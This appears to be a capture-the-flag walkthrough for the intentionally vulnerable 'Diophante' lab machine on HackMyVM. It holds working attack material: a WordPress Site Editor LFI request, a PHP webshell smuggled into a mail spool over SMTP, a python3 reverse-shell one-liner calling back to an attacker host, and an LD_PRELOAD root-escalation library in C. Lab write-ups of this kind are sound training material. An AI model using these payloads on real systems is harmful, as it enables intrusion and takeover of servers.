https://hackmyvm.eu/machines/machine.php?vm=Diophante
Scan all ports. Port 25 (SMTP) stands out: nmap does not report it as plainly open, which is a hint that something is gating it.
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Run a directory scan against port 80.
Check note.txt; it is a hint about port knocking ("knock-knock").
Knock with the sequence from the note.
knock 192.168.56.100 7000 8000 9000
Scan the ports again: port 25 is now open.
In /blog, the page source references the hostname "hard", so add an entry for it pointing at 192.168.56.100 in /etc/hosts.
Then the WordPress blog renders correctly.
Enumerate the WordPress blog with wpscan (users and plugins).
wpscan --url http://hard/blog -e u,p --no-banner
It's a classic WordPress plugin vuln: wpscan identifies the Site Editor plugin, which has a known local file inclusion in ajax_shortcode_pattern.php through the ajax_path parameter. Search Exploit-DB for the PoC.
Check that the LFI works by pulling /etc/passwd:
~ curl 'http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd' --output -
root:x:0:0:root:/root:/bin/bash
...
sabine:x:1000:1000:sabine,,,:/home/sabine:/bin/rbash
...
leonard:x:1001:1001:,,,:/home/leonard:/bin/bash
...
Two real users, sabine (login shell rbash) and leonard, both candidates for the next step.
Now we need a reverse shell. Remember that SMTP is open: Postfix appends any mail for a local user to that user's spool, /var/mail/<user>. So we can mail a PHP stager to sabine or leonard and then include the spool through the LFI; PHP ignores the mail headers around the stager and executes the <?php ... ?> part.
Use nc to talk to port 25 and send the stager to leonard (lines we type are the SMTP verbs; the rest are the server's replies):
~ nc 192.168.56.100 25
220 debian ESMTP Postfix (Debian/GNU)
helo somebody
250 debian
mail from:"somebody"
250 2.1.0 Ok
rcpt to:leonard
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["pass"]) ?>
.
250 2.0.0 Ok: queued as 0F4BE802CC
quit
221 2.0.0 Bye
Check that the stager works by including the spool and passing a command in the pass parameter:
curl 'http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&pass=id' --output -
The response is the mail headers Postfix added, followed by the output of id (running as www-data).
Now start a listener with nc (port 1234 below) and get a reverse shell by visiting the same URL with a python3 one-liner as the pass value:
http://hard/blog/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/mail/leonard&pass=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
The pass value contains spaces and quotes, so it must be URL-encoded before it reaches PHP: a browser does that when you paste the URL into the address bar; with curl, hand it over with -G --data-urlencode instead of putting it raw in the URL.
Check SUID files. xclip is a rabbit hole (I spent a lot of time on it :P); what we need is doas.
Check doas.conf (/etc/doas.conf): it lists which user may run which command as which target user.
The rule there lets us escalate from www-data to sabine:
doas -u sabine /usr/bin/setsid bash
Drop our id_rsa.pub into /home/sabine/.ssh/authorized_keys, then we can SSH in as sabine. Her login shell is rbash (see /etc/passwd above), so pass -t "bash --noprofile" to ssh to get an unrestricted bash instead of the restricted one.
Next, use doas again, this time to get from sabine to leonard.
The rule involves mutt, an email client. In mutt, press "m" to compose a mail; when it comes to writing the body, mutt opens nano as the editor, and from nano we can spawn a shell (Ctrl+R then Ctrl+X opens the "execute command" prompt; the GTFOBins recipe is reset; sh 1>&0 2>&0).
Upload id_rsa.pub again, this time to /home/leonard/.ssh/authorized_keys, and we get a full SSH terminal as leonard.
Run sudo -l and notice LD_PRELOAD in env_keep: sudo will pass that variable through to the command it runs, and the dynamic loader honours it.
In /tmp, create pwn.c with the code below.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

/* _init runs as soon as the loader maps this library (we build with
   -nostartfiles, so we supply it ourselves). Under sudo that is a
   root process, so we can drop LD_PRELOAD and spawn a root shell. */
void _init() {
    unsetenv("LD_PRELOAD");   /* don't re-inject into the shell we spawn */
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
Compile it into a shared library, pwn.so.
gcc -fPIC -shared -o pwn.so pwn.c -nostartfiles
Last step is to get root: run the command that sudo -l allows with LD_PRELOAD pointing at our library, i.e. sudo LD_PRELOAD=/tmp/pwn.so followed by that allowed command (whichever one sudo -l listed on your box). Because env_keep preserves LD_PRELOAD, the loader maps pwn.so into the root process before main runs, _init fires, and we land in a root /bin/sh.